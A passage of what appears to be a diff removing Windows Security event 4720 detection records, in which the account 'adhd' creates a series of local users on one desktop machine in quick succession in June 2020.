Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Sean</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5017</recordid>
-            <time>2020-06-11 22:05:06.716087100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.7160871Z'/&gt;&lt;EventRecordID&gt;5017&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Edward&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1162&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Edward&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Edward</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5011</recordid>
-            <time>2020-06-11 22:05:06.634661500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.6346615Z'/&gt;&lt;EventRecordID&gt;5011&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Nathan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1161&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Nathan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Nathan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5005</recordid>
-            <time>2020-06-11 22:05:06.542221000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.5422210Z'/&gt;&lt;EventRecordID&gt;5005&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Alice&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1160&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Alice&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Alice</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4999</recordid>
-            <time>2020-06-11 22:05:06.457192700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.4571927Z'/&gt;&lt;EventRecordID&gt;4999&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Sharon&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1159&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Sharon&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Sharon</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4993</recordid>
-            <time>2020-06-11 22:05:06.372095500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.3720955Z'/&gt;&lt;EventRecordID&gt;4993&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Brittany&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1158&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Brittany&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Brittany</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4987</recordid>
-            <time>2020-06-11 22:05:06.281839700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.2818397Z'/&gt;&lt;EventRecordID&gt;4987&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Matthew&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1157&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Matthew&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Matthew</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4981</recordid>
-            <time>2020-06-11 22:05:06.199175500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.1991755Z'/&gt;&lt;EventRecordID&gt;4981&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Christina&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1156&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Christina&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Christina</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4975</recordid>
-            <time>2020-06-11 22:05:06.76872300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.0768723Z'/&gt;&lt;EventRecordID&gt;4975&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Joan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1155&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Joan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Joan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4969</recordid>
-            <time>2020-06-11 22:05:05.990931400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.9909314Z'/&gt;&lt;EventRecordID&gt;4969&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Linda&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1154&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Linda&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data 